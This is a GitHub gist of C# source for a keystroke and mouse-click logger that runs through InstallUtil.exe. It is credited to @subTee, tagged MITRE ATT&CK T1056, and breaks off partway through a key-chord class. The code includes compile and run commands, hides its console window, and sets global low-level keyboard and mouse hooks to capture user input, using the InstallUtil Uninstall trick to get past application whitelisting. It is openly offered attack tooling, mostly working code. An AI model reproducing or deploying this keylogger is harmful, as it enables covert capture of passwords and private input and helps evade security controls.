Skip to content

Instantly share code, notes, and snippets.

@mosesrenegade

mosesrenegade/InstallUtilMouseKeyLogger.cs

Created February 26, 2018 23:03
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mosesrenegade/915f75fd9ac5623adae7456061ce5eb8 to your computer and use it in GitHub Desktop.
Save mosesrenegade/915f75fd9ac5623adae7456061ce5eb8 to your computer and use it in GitHub Desktop.
Download ZIP
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
Raw
InstallUtilMouseKeyLogger.cs
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
* https://code.google.com/p/klog-sharp/
*/
using System.Reflection;
using System.Threading;
using System.ComponentModel;
using System.Collections.Generic;
using System.Text;
using gma.System.Windows;
using System.Globalization;
using System.Drawing;
using System.Drawing.Imaging;
using System.Security.Permissions;
/*
Author: Casey Smith, @subTee
License: BSD 3-Clause
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:iukl.dll /target:library InstallUtilMouseKeyLogger.cs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /U iukl.dll
https://attack.mitre.org/wiki/Technique/T1056
*/
static class Program
{
/// <summary>
/// The main entry point for the application.
/// </summary>
[STAThread]
public static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
// not showing the form, just creating it
Klog.OptionsForm form = new Klog.OptionsForm();
Application.Run();
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
public override void Uninstall(System.Collections.IDictionary savedState)
{
Console.WriteLine("Calling Main");
// Hide
IntPtr handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE);
Program.Main();
}
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
const int SW_HIDE = 0;
const int SW_SHOW = 5;
}
namespace gma.System.Windows
{
/// <summary>
/// This class allows you to tap keyboard and mouse and / or to detect their activity even when an
/// application runes in background or does not have any user interface at all. This class raises
/// common .NET events with KeyEventArgs and MouseEventArgs so you can easily retrive any information you need.
/// </summary>
/// <remarks>
/// Does not capture unicode chars, only ASCII.
/// </remarks>
public class UserActivityHook
{
#region Windows structure definitions
/// <summary>
/// The POINT structure defines the x- and y- coordinates of a point.
/// </summary>
/// <remarks>
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/gdi/rectangl_0tiq.asp
/// </remarks>
[StructLayout(LayoutKind.Sequential)]
private class POINT
{
/// <summary>
/// Specifies the x-coordinate of the point.
/// </summary>
public int x;
/// <summary>
/// Specifies the y-coordinate of the point.
/// </summary>
public int y;
}
/// <summary>
/// The MOUSEHOOKSTRUCT structure contains information about a mouse event passed to a WH_MOUSE hook procedure, MouseProc.
/// </summary>
/// <remarks>
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookstructures/cwpstruct.asp
/// </remarks>
[StructLayout(LayoutKind.Sequential)]
private class MouseHookStruct
{
/// <summary>
/// Specifies a POINT structure that contains the x- and y-coordinates of the cursor, in screen coordinates.
/// </summary>
public POINT pt;
/// <summary>
/// Handle to the window that will receive the mouse message corresponding to the mouse event.
/// </summary>
public int hwnd;
/// <summary>
/// Specifies the hit-test value. For a list of hit-test values, see the description of the WM_NCHITTEST message.
/// </summary>
public int wHitTestCode;
/// <summary>
/// Specifies extra information associated with the message.
/// </summary>
public int dwExtraInfo;
}
/// <summary>
/// The MSLLHOOKSTRUCT structure contains information about a low-level keyboard input event.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
private class MouseLLHookStruct
{
/// <summary>
/// Specifies a POINT structure that contains the x- and y-coordinates of the cursor, in screen coordinates.
/// </summary>
public POINT pt;
/// <summary>
/// If the message is WM_MOUSEWHEEL, the high-order word of this member is the wheel delta.
/// The low-order word is reserved. A positive value indicates that the wheel was rotated forward,
/// away from the user; a negative value indicates that the wheel was rotated backward, toward the user.
/// One wheel click is defined as WHEEL_DELTA, which is 120.
///If the message is WM_XBUTTONDOWN, WM_XBUTTONUP, WM_XBUTTONDBLCLK, WM_NCXBUTTONDOWN, WM_NCXBUTTONUP,
/// or WM_NCXBUTTONDBLCLK, the high-order word specifies which X button was pressed or released,
/// and the low-order word is reserved. This value can be one or more of the following values. Otherwise, mouseData is not used.
///XBUTTON1
///The first X button was pressed or released.
///XBUTTON2
///The second X button was pressed or released.
/// </summary>
public int mouseData;
/// <summary>
/// Specifies the event-injected flag. An application can use the following value to test the mouse flags. Value Purpose
///LLMHF_INJECTED Test the event-injected flag.
///0
///Specifies whether the event was injected. The value is 1 if the event was injected; otherwise, it is 0.
///1-15
///Reserved.
/// </summary>
public int flags;
/// <summary>
/// Specifies the time stamp for this message.
/// </summary>
public int time;
/// <summary>
/// Specifies extra information associated with the message.
/// </summary>
public int dwExtraInfo;
}
/// <summary>
/// The KBDLLHOOKSTRUCT structure contains information about a low-level keyboard input event.
/// </summary>
/// <remarks>
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookstructures/cwpstruct.asp
/// </remarks>
[StructLayout(LayoutKind.Sequential)]
private class KeyboardHookStruct
{
/// <summary>
/// Specifies a virtual-key code. The code must be a value in the range 1 to 254.
/// </summary>
public int vkCode;
/// <summary>
/// Specifies a hardware scan code for the key.
/// </summary>
public int scanCode;
/// <summary>
/// Specifies the extended-key flag, event-injected flag, context code, and transition-state flag.
/// </summary>
public int flags;
/// <summary>
/// Specifies the time stamp for this message.
/// </summary>
public int time;
/// <summary>
/// Specifies extra information associated with the message.
/// </summary>
public int dwExtraInfo;
}
#endregion
#region Windows function imports
/// <summary>
/// The SetWindowsHookEx function installs an application-defined hook procedure into a hook chain.
/// You would install a hook procedure to monitor the system for certain types of events. These events
/// are associated either with a specific thread or with all threads in the same desktop as the calling thread.
/// </summary>
/// <param name="idHook">
/// [in] Specifies the type of hook procedure to be installed. This parameter can be one of the following values.
/// </param>
/// <param name="lpfn">
/// [in] Pointer to the hook procedure. If the dwThreadId parameter is zero or specifies the identifier of a
/// thread created by a different process, the lpfn parameter must point to a hook procedure in a dynamic-link
/// library (DLL). Otherwise, lpfn can point to a hook procedure in the code associated with the current process.
/// </param>
/// <param name="hMod">
/// [in] Handle to the DLL containing the hook procedure pointed to by the lpfn parameter.
/// The hMod parameter must be set to NULL if the dwThreadId parameter specifies a thread created by
/// the current process and if the hook procedure is within the code associated with the current process.
/// </param>
/// <param name="dwThreadId">
/// [in] Specifies the identifier of the thread with which the hook procedure is to be associated.
/// If this parameter is zero, the hook procedure is associated with all existing threads running in the
/// same desktop as the calling thread.
/// </param>
/// <returns>
/// If the function succeeds, the return value is the handle to the hook procedure.
/// If the function fails, the return value is NULL. To get extended error information, call GetLastError.
/// </returns>
/// <remarks>
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookfunctions/setwindowshookex.asp
/// </remarks>
[DllImport("user32.dll", CharSet = CharSet.Auto,
CallingConvention = CallingConvention.StdCall, SetLastError = true)]
private static extern int SetWindowsHookEx(
int idHook,
HookProc lpfn,
IntPtr hMod,
int dwThreadId);
/// <summary>
/// The UnhookWindowsHookEx function removes a hook procedure installed in a hook chain by the SetWindowsHookEx function.
/// </summary>
/// <param name="idHook">
/// [in] Handle to the hook to be removed. This parameter is a hook handle obtained by a previous call to SetWindowsHookEx.
/// </param>
/// <returns>
/// If the function succeeds, the return value is nonzero.
/// If the function fails, the return value is zero. To get extended error information, call GetLastError.
/// </returns>
/// <remarks>
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookfunctions/setwindowshookex.asp
/// </remarks>
[DllImport("user32.dll", CharSet = CharSet.Auto,
CallingConvention = CallingConvention.StdCall, SetLastError = true)]
private static extern int UnhookWindowsHookEx(int idHook);
/// <summary>
/// The CallNextHookEx function passes the hook information to the next hook procedure in the current hook chain.
/// A hook procedure can call this function either before or after processing the hook information.
/// </summary>
/// <param name="idHook">Ignored.</param>
/// <param name="nCode">
/// [in] Specifies the hook code passed to the current hook procedure.
/// The next hook procedure uses this code to determine how to process the hook information.
/// </param>
/// <param name="wParam">
/// [in] Specifies the wParam value passed to the current hook procedure.
/// The meaning of this parameter depends on the type of hook associated with the current hook chain.
/// </param>
/// <param name="lParam">
/// [in] Specifies the lParam value passed to the current hook procedure.
/// The meaning of this parameter depends on the type of hook associated with the current hook chain.
/// </param>
/// <returns>
/// This value is returned by the next hook procedure in the chain.
/// The current hook procedure must also return this value. The meaning of the return value depends on the hook type.
/// For more information, see the descriptions of the individual hook procedures.
/// </returns>
/// <remarks>
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookfunctions/setwindowshookex.asp
/// </remarks>
[DllImport("user32.dll", CharSet = CharSet.Auto,
CallingConvention = CallingConvention.StdCall)]
private static extern int CallNextHookEx(
int idHook,
int nCode,
int wParam,
IntPtr lParam);
/// <summary>
/// The CallWndProc hook procedure is an application-defined or library-defined callback
/// function used with the SetWindowsHookEx function. The HOOKPROC type defines a pointer
/// to this callback function. CallWndProc is a placeholder for the application-defined
/// or library-defined function name.
/// </summary>
/// <param name="nCode">
/// [in] Specifies whether the hook procedure must process the message.
/// If nCode is HC_ACTION, the hook procedure must process the message.
/// If nCode is less than zero, the hook procedure must pass the message to the
/// CallNextHookEx function without further processing and must return the
/// value returned by CallNextHookEx.
/// </param>
/// <param name="wParam">
/// [in] Specifies whether the message was sent by the current thread.
/// If the message was sent by the current thread, it is nonzero; otherwise, it is zero.
/// </param>
/// <param name="lParam">
/// [in] Pointer to a CWPSTRUCT structure that contains details about the message.
/// </param>
/// <returns>
/// If nCode is less than zero, the hook procedure must return the value returned by CallNextHookEx.
/// If nCode is greater than or equal to zero, it is highly recommended that you call CallNextHookEx
/// and return the value it returns; otherwise, other applications that have installed WH_CALLWNDPROC
/// hooks will not receive hook notifications and may behave incorrectly as a result. If the hook
/// procedure does not call CallNextHookEx, the return value should be zero.
/// </returns>
/// <remarks>
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/windowing/hooks/hookreference/hookfunctions/callwndproc.asp
/// </remarks>
private delegate int HookProc(int nCode, int wParam, IntPtr lParam);
/// <summary>
/// The ToAscii function translates the specified virtual-key code and keyboard
/// state to the corresponding character or characters. The function translates the code
/// using the input language and physical keyboard layout identified by the keyboard layout handle.
/// </summary>
/// <param name="uVirtKey">
/// [in] Specifies the virtual-key code to be translated.
/// </param>
/// <param name="uScanCode">
/// [in] Specifies the hardware scan code of the key to be translated.
/// The high-order bit of this value is set if the key is up (not pressed).
/// </param>
/// <param name="lpbKeyState">
/// [in] Pointer to a 256-byte array that contains the current keyboard state.
/// Each element (byte) in the array contains the state of one key.
/// If the high-order bit of a byte is set, the key is down (pressed).
/// The low bit, if set, indicates that the key is toggled on. In this function,
/// only the toggle bit of the CAPS LOCK key is relevant. The toggle state
/// of the NUM LOCK and SCROLL LOCK keys is ignored.
/// </param>
/// <param name="lpwTransKey">
/// [out] Pointer to the buffer that receives the translated character or characters.
/// </param>
/// <param name="fuState">
/// [in] Specifies whether a menu is active. This parameter must be 1 if a menu is active, or 0 otherwise.
/// </param>
/// <returns>
/// If the specified key is a dead key, the return value is negative. Otherwise, it is one of the following values.
/// Value Meaning
/// 0 The specified virtual key has no translation for the current state of the keyboard.
/// 1 One character was copied to the buffer.
/// 2 Two characters were copied to the buffer. This usually happens when a dead-key character
/// (accent or diacritic) stored in the keyboard layout cannot be composed with the specified
/// virtual key to form a single character.
/// </returns>
/// <remarks>
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/userinput/keyboardinput/keyboardinputreference/keyboardinputfunctions/toascii.asp
/// </remarks>
[DllImport("user32")]
private static extern int ToAscii(
int uVirtKey,
int uScanCode,
byte[] lpbKeyState,
byte[] lpwTransKey,
int fuState);
[DllImport("user32")]
public static extern int ToUnicode(
int wVirtKey,
int wScanCode,
byte[] lpKeyState,
char[] pwszBuff,
int cchBuff,
int wFlags);
/// <summary>
/// The GetKeyboardState function copies the status of the 256 virtual keys to the
/// specified buffer.
/// </summary>
/// <param name="pbKeyState">
/// [in] Pointer to a 256-byte array that contains keyboard key states.
/// </param>
/// <returns>
/// If the function succeeds, the return value is nonzero.
/// If the function fails, the return value is zero. To get extended error information, call GetLastError.
/// </returns>
/// <remarks>
/// http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/userinput/keyboardinput/keyboardinputreference/keyboardinputfunctions/toascii.asp
/// </remarks>
[DllImport("user32")]
private static extern int GetKeyboardState(byte[] pbKeyState);
[DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
private static extern short GetKeyState(int vKey);
#endregion
#region Windows constants
//values from Winuser.h in Microsoft SDK.
/// <summary>
/// Windows NT/2000/XP: Installs a hook procedure that monitors low-level mouse input events.
/// </summary>
private const int WH_MOUSE_LL = 14;
/// <summary>
/// Windows NT/2000/XP: Installs a hook procedure that monitors low-level keyboard input events.
/// </summary>
private const int WH_KEYBOARD_LL = 13;
/// <summary>
/// Installs a hook procedure that monitors mouse messages. For more information, see the MouseProc hook procedure.
/// </summary>
private const int WH_MOUSE = 7;
/// <summary>
/// Installs a hook procedure that monitors keystroke messages. For more information, see the KeyboardProc hook procedure.
/// </summary>
private const int WH_KEYBOARD = 2;
/// <summary>
/// The WM_MOUSEMOVE message is posted to a window when the cursor moves.
/// </summary>
private const int WM_MOUSEMOVE = 0x200;
/// <summary>
/// The WM_LBUTTONDOWN message is posted when the user presses the left mouse button
/// </summary>
private const int WM_LBUTTONDOWN = 0x201;
/// <summary>
/// The WM_RBUTTONDOWN message is posted when the user presses the right mouse button
/// </summary>
private const int WM_RBUTTONDOWN = 0x204;
/// <summary>
/// The WM_MBUTTONDOWN message is posted when the user presses the middle mouse button
/// </summary>
private const int WM_MBUTTONDOWN = 0x207;
/// <summary>
/// The WM_LBUTTONUP message is posted when the user releases the left mouse button
/// </summary>
private const int WM_LBUTTONUP = 0x202;
/// <summary>
/// The WM_RBUTTONUP message is posted when the user releases the right mouse button
/// </summary>
private const int WM_RBUTTONUP = 0x205;
/// <summary>
/// The WM_MBUTTONUP message is posted when the user releases the middle mouse button
/// </summary>
private const int WM_MBUTTONUP = 0x208;
/// <summary>
/// The WM_LBUTTONDBLCLK message is posted when the user double-clicks the left mouse button
/// </summary>
private const int WM_LBUTTONDBLCLK = 0x203;
/// <summary>
/// The WM_RBUTTONDBLCLK message is posted when the user double-clicks the right mouse button
/// </summary>
private const int WM_RBUTTONDBLCLK = 0x206;
/// <summary>
/// The WM_RBUTTONDOWN message is posted when the user presses the right mouse button
/// </summary>
private const int WM_MBUTTONDBLCLK = 0x209;
/// <summary>
/// The WM_MOUSEWHEEL message is posted when the user presses the mouse wheel.
/// </summary>
private const int WM_MOUSEWHEEL = 0x020A;
/// <summary>
/// The WM_KEYDOWN message is posted to the window with the keyboard focus when a nonsystem
/// key is pressed. A nonsystem key is a key that is pressed when the ALT key is not pressed.
/// </summary>
private const int WM_KEYDOWN = 0x100;
/// <summary>
/// The WM_KEYUP message is posted to the window with the keyboard focus when a nonsystem
/// key is released. A nonsystem key is a key that is pressed when the ALT key is not pressed,
/// or a keyboard key that is pressed when a window has the keyboard focus.
/// </summary>
private const int WM_KEYUP = 0x101;
/// <summary>
/// The WM_SYSKEYDOWN message is posted to the window with the keyboard focus when the user
/// presses the F10 key (which activates the menu bar) or holds down the ALT key and then
/// presses another key. It also occurs when no window currently has the keyboard focus;
/// in this case, the WM_SYSKEYDOWN message is sent to the active window. The window that
/// receives the message can distinguish between these two contexts by checking the context
/// code in the lParam parameter.
/// </summary>
private const int WM_SYSKEYDOWN = 0x104;
/// <summary>
/// The WM_SYSKEYUP message is posted to the window with the keyboard focus when the user
/// releases a key that was pressed while the ALT key was held down. It also occurs when no
/// window currently has the keyboard focus; in this case, the WM_SYSKEYUP message is sent
/// to the active window. The window that receives the message can distinguish between
/// these two contexts by checking the context code in the lParam parameter.
/// </summary>
private const int WM_SYSKEYUP = 0x105;
private const byte VK_SHIFT = 0x10;
private const byte VK_CAPITAL = 0x14;
private const byte VK_NUMLOCK = 0x90;
#endregion
/// <summary>
/// Creates an instance of UserActivityHook object and sets mouse and keyboard hooks.
/// </summary>
/// <exception cref="Win32Exception">Any windows problem.</exception>
public UserActivityHook()
{
Start();
}
/// <summary>
/// Creates an instance of UserActivityHook object and installs both or one of mouse and/or keyboard hooks and starts rasing events
/// </summary>
/// <param name="InstallMouseHook"><b>true</b> if mouse events must be monitored</param>
/// <param name="InstallKeyboardHook"><b>true</b> if keyboard events must be monitored</param>
/// <exception cref="Win32Exception">Any windows problem.</exception>
/// <remarks>
/// To create an instance without installing hooks call new UserActivityHook(false, false)
/// </remarks>
public UserActivityHook(bool InstallMouseHook, bool InstallKeyboardHook)
{
Start(InstallMouseHook, InstallKeyboardHook);
}
/// <summary>
/// Destruction.
/// </summary>
~UserActivityHook()
{
//uninstall hooks and do not throw exceptions
Stop(true, true, false);
}
/// <summary>
/// Occurs when the user moves the mouse, presses any mouse button or scrolls the wheel
/// </summary>
public event MouseEventHandler OnMouseActivity;
/// <summary>
/// Occurs when the user presses a key
/// </summary>
public event KeyEventHandler KeyDown;
/// <summary>
/// Occurs when the user presses and releases
/// </summary>
public event KeyPressEventHandler KeyPress;
/// <summary>
/// Occurs when the user releases a key
/// </summary>
public event KeyEventHandler KeyUp;
/// <summary>
/// Stores the handle to the mouse hook procedure.
/// </summary>
private int hMouseHook = 0;
/// <summary>
/// Stores the handle to the keyboard hook procedure.
/// </summary>
private int hKeyboardHook = 0;
/// <summary>
/// Declare MouseHookProcedure as HookProc type.
/// </summary>
private static HookProc MouseHookProcedure;
/// <summary>
/// Declare KeyboardHookProcedure as HookProc type.
/// </summary>
private static HookProc KeyboardHookProcedure;
/// <summary>
/// Installs both mouse and keyboard hooks and starts rasing events
/// </summary>
/// <exception cref="Win32Exception">Any windows problem.</exception>
public void Start()
{
this.Start(true, true);
}
/// <summary>
/// Installs both or one of mouse and/or keyboard hooks and starts rasing events
/// </summary>
/// <param name="InstallMouseHook"><b>true</b> if mouse events must be monitored</param>
/// <param name="InstallKeyboardHook"><b>true</b> if keyboard events must be monitored</param>
/// <exception cref="Win32Exception">Any windows problem.</exception>
public void Start(bool InstallMouseHook, bool InstallKeyboardHook)
{
// install Mouse hook only if it is not installed and must be installed
if (hMouseHook == 0 && InstallMouseHook)
{
// Create an instance of HookProc.
MouseHookProcedure = new HookProc(MouseHookProc);
//install hook
hMouseHook = SetWindowsHookEx(
WH_MOUSE_LL,
MouseHookProcedure,
Marshal.GetHINSTANCE(
Assembly.GetExecutingAssembly().GetModules()[0]),
0);
//If SetWindowsHookEx fails.
if (hMouseHook == 0)
{
//Returns the error code returned by the last unmanaged function called using platform invoke that has the DllImportAttribute.SetLastError flag set.
int errorCode = Marshal.GetLastWin32Error();
//do cleanup
Stop(true, false, false);
//Initializes and throws a new instance of the Win32Exception class with the specified error.
throw new Win32Exception(errorCode);
}
}
// install Keyboard hook only if it is not installed and must be installed
if (hKeyboardHook == 0 && InstallKeyboardHook)
{
// Create an instance of HookProc.
KeyboardHookProcedure = new HookProc(KeyboardHookProc);
//install hook
hKeyboardHook = SetWindowsHookEx(
WH_KEYBOARD_LL,
KeyboardHookProcedure,
Marshal.GetHINSTANCE(
Assembly.GetExecutingAssembly().GetModules()[0]),
0);
//If SetWindowsHookEx fails.
if (hKeyboardHook == 0)
{
//Returns the error code returned by the last unmanaged function called using platform invoke that has the DllImportAttribute.SetLastError flag set.
int errorCode = Marshal.GetLastWin32Error();
//do cleanup
Stop(false, true, false);
//Initializes and throws a new instance of the Win32Exception class with the specified error.
throw new Win32Exception(errorCode);
}
}
}
/// <summary>
/// Stops monitoring both mouse and keyboard events and rasing events.
/// </summary>
/// <exception cref="Win32Exception">Any windows problem.</exception>
public void Stop()
{
this.Stop(true, true, true);
}
/// <summary>
/// Stops monitoring both or one of mouse and/or keyboard events and rasing events.
/// </summary>
/// <param name="UninstallMouseHook"><b>true</b> if mouse hook must be uninstalled</param>
/// <param name="UninstallKeyboardHook"><b>true</b> if keyboard hook must be uninstalled</param>
/// <param name="ThrowExceptions"><b>true</b> if exceptions which occured during uninstalling must be thrown</param>
/// <exception cref="Win32Exception">Any windows problem.</exception>
public void Stop(bool UninstallMouseHook, bool UninstallKeyboardHook, bool ThrowExceptions)
{
//if mouse hook set and must be uninstalled
if (hMouseHook != 0 && UninstallMouseHook)
{
//uninstall hook
int retMouse = UnhookWindowsHookEx(hMouseHook);
//reset invalid handle
hMouseHook = 0;
//if failed and exception must be thrown
if (retMouse == 0 && ThrowExceptions)
{
//Returns the error code returned by the last unmanaged function called using platform invoke that has the DllImportAttribute.SetLastError flag set.
int errorCode = Marshal.GetLastWin32Error();
//Initializes and throws a new instance of the Win32Exception class with the specified error.
throw new Win32Exception(errorCode);
}
}
//if keyboard hook set and must be uninstalled
if (hKeyboardHook != 0 && UninstallKeyboardHook)
{
//uninstall hook
int retKeyboard = UnhookWindowsHookEx(hKeyboardHook);
//reset invalid handle
hKeyboardHook = 0;
//if failed and exception must be thrown
if (retKeyboard == 0 && ThrowExceptions)
{
//Returns the error code returned by the last unmanaged function called using platform invoke that has the DllImportAttribute.SetLastError flag set.
int errorCode = Marshal.GetLastWin32Error();
//Initializes and throws a new instance of the Win32Exception class with the specified error.
throw new Win32Exception(errorCode);
}
}
}
/// <summary>
/// A callback function which will be called every time a mouse activity detected.
/// </summary>
/// <param name="nCode">
/// [in] Specifies whether the hook procedure must process the message.
/// If nCode is HC_ACTION, the hook procedure must process the message.
/// If nCode is less than zero, the hook procedure must pass the message to the
/// CallNextHookEx function without further processing and must return the
/// value returned by CallNextHookEx.
/// </param>
/// <param name="wParam">
/// [in] Specifies whether the message was sent by the current thread.
/// If the message was sent by the current thread, it is nonzero; otherwise, it is zero.
/// </param>
/// <param name="lParam">
/// [in] Pointer to a CWPSTRUCT structure that contains details about the message.
/// </param>
/// <returns>
/// If nCode is less than zero, the hook procedure must return the value returned by CallNextHookEx.
/// If nCode is greater than or equal to zero, it is highly recommended that you call CallNextHookEx
/// and return the value it returns; otherwise, other applications that have installed WH_CALLWNDPROC
/// hooks will not receive hook notifications and may behave incorrectly as a result. If the hook
/// procedure does not call CallNextHookEx, the return value should be zero.
/// </returns>
private int MouseHookProc(int nCode, int wParam, IntPtr lParam)
{
// if ok and someone listens to our events
if ((nCode >= 0) && (OnMouseActivity != null)
&& wParam != WM_MOUSEMOVE) // and not just a mouse move
{
//Marshall the data from callback.
MouseLLHookStruct mouseHookStruct = (MouseLLHookStruct)Marshal.PtrToStructure(lParam, typeof(MouseLLHookStruct));
//detect button clicked
MouseButtons button = MouseButtons.None;
short mouseDelta = 0;
switch (wParam)
{
case WM_LBUTTONDOWN:
//case WM_LBUTTONUP:
//case WM_LBUTTONDBLCLK:
button = MouseButtons.Left;
break;
case WM_RBUTTONDOWN:
//case WM_RBUTTONUP:
//case WM_RBUTTONDBLCLK:
button = MouseButtons.Right;
break;
case WM_MOUSEWHEEL:
//If the message is WM_MOUSEWHEEL, the high-order word of mouseData member is the wheel delta.
//One wheel click is defined as WHEEL_DELTA, which is 120.
//(value >> 16) & 0xffff; retrieves the high-order word from the given 32-bit value
mouseDelta = (short)((mouseHookStruct.mouseData >> 16) & 0xffff);
//TODO: X BUTTONS (I havent them so was unable to test)
//If the message is WM_XBUTTONDOWN, WM_XBUTTONUP, WM_XBUTTONDBLCLK, WM_NCXBUTTONDOWN, WM_NCXBUTTONUP,
//or WM_NCXBUTTONDBLCLK, the high-order word specifies which X button was pressed or released,
//and the low-order word is reserved. This value can be one or more of the following values.
//Otherwise, mouseData is not used.
break;
}
//double clicks
int clickCount = 0;
if (button != MouseButtons.None)
if (wParam == WM_LBUTTONDBLCLK || wParam == WM_RBUTTONDBLCLK) clickCount = 2;
else clickCount = 1;
//generate event
MouseEventArgs e = new MouseEventArgs(
button,
clickCount,
mouseHookStruct.pt.x,
mouseHookStruct.pt.y,
mouseDelta);
//raise it
OnMouseActivity(this, e);
}
//call next hook
return CallNextHookEx(hMouseHook, nCode, wParam, lParam);
}
/// <summary>
/// A callback function which will be called every time a keyboard activity detected.
/// </summary>
/// <param name="nCode">
/// [in] Specifies whether the hook procedure must process the message.
/// If nCode is HC_ACTION, the hook procedure must process the message.
/// If nCode is less than zero, the hook procedure must pass the message to the
/// CallNextHookEx function without further processing and must return the
/// value returned by CallNextHookEx.
/// </param>
/// <param name="wParam">
/// [in] Specifies whether the message was sent by the current thread.
/// If the message was sent by the current thread, it is nonzero; otherwise, it is zero.
/// </param>
/// <param name="lParam">
/// [in] Pointer to a CWPSTRUCT structure that contains details about the message.
/// </param>
/// <returns>
/// If nCode is less than zero, the hook procedure must return the value returned by CallNextHookEx.
/// If nCode is greater than or equal to zero, it is highly recommended that you call CallNextHookEx
/// and return the value it returns; otherwise, other applications that have installed WH_CALLWNDPROC
/// hooks will not receive hook notifications and may behave incorrectly as a result. If the hook
/// procedure does not call CallNextHookEx, the return value should be zero.
/// </returns>
private int KeyboardHookProc(int nCode, Int32 wParam, IntPtr lParam)
{
//indicates if any of underlaing events set e.Handled flag
bool handled = false;
//it was ok and someone listens to events
if ((nCode >= 0) && (KeyDown != null || KeyUp != null || KeyPress != null))
{
//read structure KeyboardHookStruct at lParam
KeyboardHookStruct MyKeyboardHookStruct = (KeyboardHookStruct)Marshal.PtrToStructure(lParam, typeof(KeyboardHookStruct));
//raise KeyDown
if (KeyDown != null && (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN))
{
Keys keyData = (Keys)MyKeyboardHookStruct.vkCode;
KeyEventArgs e = new KeyEventArgs(keyData);
KeyDown(this, e);
handled = handled || e.Handled;
}
// raise KeyPress
if (KeyPress != null && wParam == WM_KEYDOWN)
{
bool isDownShift = ((GetKeyState(VK_SHIFT) & 0x80) == 0x80 ? true : false);
bool isDownCapslock = (GetKeyState(VK_CAPITAL) != 0 ? true : false);
byte[] keyState = new byte[256];
GetKeyboardState(keyState);
byte[] inBuffer = new byte[2];
if (ToAscii(MyKeyboardHookStruct.vkCode,
MyKeyboardHookStruct.scanCode,
keyState,
inBuffer,
MyKeyboardHookStruct.flags) == 1)
{
char key = (char)inBuffer[0];
if ((isDownCapslock ^ isDownShift) && Char.IsLetter(key)) key = Char.ToUpper(key);
KeyPressEventArgs e = new KeyPressEventArgs(key);
KeyPress(this, e);
handled = handled || e.Handled;
}
/*
// below does not work
char[] inBuffer = new char[4];
if (ToUnicode(MyKeyboardHookStruct.vkCode,
MyKeyboardHookStruct.scanCode,
keyState,
inBuffer, inBuffer.Length,
MyKeyboardHookStruct.flags) == 1)
{
char key = inBuffer[0];
//if ((isDownCapslock ^ isDownShift) && Char.IsLetter(key)) key = Char.ToUpper(key);
KeyPressEventArgs e = new KeyPressEventArgs(key);
KeyPress(this, e);
handled = handled || e.Handled;
}
*/
}
// raise KeyUp
if (KeyUp != null && (wParam == WM_KEYUP || wParam == WM_SYSKEYUP))
{
Keys keyData = (Keys)MyKeyboardHookStruct.vkCode;
KeyEventArgs e = new KeyEventArgs(keyData);
KeyUp(this, e);
handled = handled || e.Handled;
}
}
//if event handled in application do not handoff to other listeners
if (handled)
return 1;
else
return CallNextHookEx(hKeyboardHook, nCode, wParam, lParam);
}
}
}
namespace Klog
{
/// <summary>
/// We want to log things like:
/// [Ctrl] // by itself
/// [Ctrl+A+V] // all simultaneous
/// [Ctrl+Alt+Del] // all simultaneous
/// [Alt+F,C] // Alt held, then F, C pressed in succession
///
/// Bug:
/// - we don't distinguish between "Alt+E+V" (same time) and "Alt+E,V" (consecutive)
/// </summary>
public class KeyChord
{
bool _completed = false;
bool _ctrlDown = false;
bool _altDown = false;
bool _shiftDown = false;
bool _winDown = false;
Keys _lastKeyDown;
List<Keys> _normalKeys = new List<Keys>();
String _stringRep = String.Empty;
public KeyChord() { }
/// <summary>
/// Reopen a completed chord
/// </summary>
public void Reopen()
{
_completed = false;
_lastKeyDown = Keys.None;
_normalKeys.Clear();
_stringRep = String.Empty;
}
// Chord is "Started" if any modifiers were pressed
public bool HasControlKeys { get { return _ctrlDown || _altDown || _winDown; } }
public bool Completed { get { return _completed; } }
public event EventHandler ClipboardAction;
public void AddKeyDown(Keys k)
{
if (_completed) { throw new InvalidOperationException("Chord completed."); }
switch (k)
{
case Keys.RControlKey:
case Keys.LControlKey:
_ctrlDown = true; break;
case Keys.LMenu:
case Keys.RMenu:
_altDown = true; break;
case Keys.RShiftKey:
case Keys.LShiftKey:
_shiftDown = true; break;
case Keys.RWin:
case Keys.LWin:
_winDown = true; break;
default:
// Add the key
if (HasControlKeys && _lastKeyDown != k)
{
_normalKeys.Add(k);
}
break;
}
_lastKeyDown = k;
}
public void AddKeyUp(Keys k)
{
if (_completed) { throw new InvalidOperationException("Chord completed."); }
switch (k)
{
case Keys.RControlKey:
case Keys.LControlKey:
CompleteChord();
_ctrlDown = false; break;
case Keys.LMenu:
case Keys.RMenu:
CompleteChord();
_altDown = false; break;
case Keys.RShiftKey:
case Keys.LShiftKey:
CompleteChord();
_shiftDown = false; break;
case Keys.RWin:
